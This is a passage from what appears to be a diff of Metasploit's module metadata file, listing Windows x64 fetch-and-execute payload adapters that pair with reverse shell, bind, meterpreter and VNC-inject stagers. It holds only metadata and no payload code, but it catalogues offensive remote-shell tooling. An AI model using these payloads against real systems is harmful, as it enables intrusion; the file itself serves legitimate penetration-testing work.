- "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/vncinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/vncinject/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/http/x64/vncinject/reverse_tcp_uuid": { - "name": "HTTP Fetch, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/http/x64/vncinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/vncinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/vncinject/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": 
"windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/http/x64/vncinject/reverse_winhttp": { - "name": "HTTP Fetch, Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/http/x64/vncinject/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/vncinject/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/vncinject/reverse_winhttp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_cmd/windows/http/x64/vncinject/reverse_winhttps": { - "name": "HTTP Fetch, Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/http/x64/vncinject/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - 
"platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/vncinject/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/vncinject/reverse_winhttps", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_cmd/windows/https/x64/custom/bind_ipv6_tcp": { - "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/https/x64/custom/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/custom/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/custom/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - 
"payload_cmd/windows/https/x64/custom/bind_ipv6_tcp_uuid": { - "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/https/x64/custom/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/custom/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/custom/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/https/x64/custom/bind_named_pipe": { - "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/https/x64/custom/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": 
"2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/custom/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/custom/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/https/x64/custom/bind_tcp": { - "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/https/x64/custom/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nListen for a connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/custom/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/custom/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/https/x64/custom/bind_tcp_rc4": { - "name": "HTTPS Fetch, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/https/x64/custom/bind_tcp_rc4", - "aliases": [], - 
"rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/custom/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/custom/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/https/x64/custom/bind_tcp_uuid": { - "name": "HTTPS Fetch, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/https/x64/custom/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/custom/bind_tcp_uuid", - "check": false, - "post_auth": false, - 
"default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/custom/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/https/x64/custom/reverse_http": { - "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/https/x64/custom/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/custom/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/custom/reverse_http", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_cmd/windows/https/x64/custom/reverse_https": { - "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/https/x64/custom/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "hdm ", - "agix", - "rwincey" - ], - "description": "Fetch and 
execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/custom/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/custom/reverse_https", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_cmd/windows/https/x64/custom/reverse_named_pipe": { - "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/https/x64/custom/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/custom/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": 
"windows/x64/custom/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_cmd/windows/https/x64/custom/reverse_tcp": { - "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/https/x64/custom/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/custom/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/custom/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/https/x64/custom/reverse_tcp_rc4": { - "name": "HTTPS Fetch, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/https/x64/custom/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": 
"cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/custom/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/custom/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/https/x64/custom/reverse_tcp_uuid": { - "name": "HTTPS Fetch, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/https/x64/custom/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/custom/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/custom/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - 
"payload_cmd/windows/https/x64/custom/reverse_winhttp": { - "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/https/x64/custom/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/custom/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/custom/reverse_winhttp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_cmd/windows/https/x64/custom/reverse_winhttps": { - "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/https/x64/custom/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - 
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/custom/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/custom/reverse_winhttps", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_cmd/windows/https/x64/encrypted_shell/reverse_tcp": { - "name": "HTTPS Fetch, Windows Command Shell, Encrypted Reverse TCP Stager", - "fullname": "payload/cmd/windows/https/x64/encrypted_shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Matt Graeber", - "Shelby Pace" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/encrypted_shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/encrypted_shell/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/encrypted_shell", - "stager_refname": "windows/x64/encrypted_reverse_tcp" - }, - "payload_cmd/windows/https/x64/encrypted_shell_reverse_tcp": { - "name": "HTTPS Fetch, Windows Encrypted Reverse Shell", - "fullname": 
"payload/cmd/windows/https/x64/encrypted_shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Matt Graeber", - "Shelby Pace" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn an encrypted command shell", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/encrypted_shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/encrypted_shell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/https/x64/exec": { - "name": "HTTPS Fetch, Windows x64 Execute Command", - "fullname": "payload/cmd/windows/https/x64/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nExecute an arbitrary command (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/exec", - "staged": false 
- }, - "payload_cmd/windows/https/x64/loadlibrary": { - "name": "HTTPS Fetch, Windows x64 LoadLibrary Path", - "fullname": "payload/cmd/windows/https/x64/loadlibrary", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "scriptjunkie", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nLoad an arbitrary x64 library path", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/loadlibrary", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/loadlibrary", - "staged": false - }, - "payload_cmd/windows/https/x64/messagebox": { - "name": "HTTPS Fetch, Windows MessageBox x64", - "fullname": "payload/cmd/windows/https/x64/messagebox", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "pasta " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a dialog via MessageBox using a customizable title, text & icon", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/messagebox", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": 
"cmd/windows/https/x64", - "adapted_refname": "windows/x64/messagebox", - "staged": false - }, - "payload_cmd/windows/https/x64/meterpreter/bind_ipv6_tcp": { - "name": "HTTPS Fetch, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/https/x64/meterpreter/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/https/x64/meterpreter/bind_ipv6_tcp_uuid": { - "name": "HTTPS Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/https/x64/meterpreter/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - 
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/https/x64/meterpreter/bind_named_pipe": { - "name": "HTTPS Fetch, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/https/x64/meterpreter/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - 
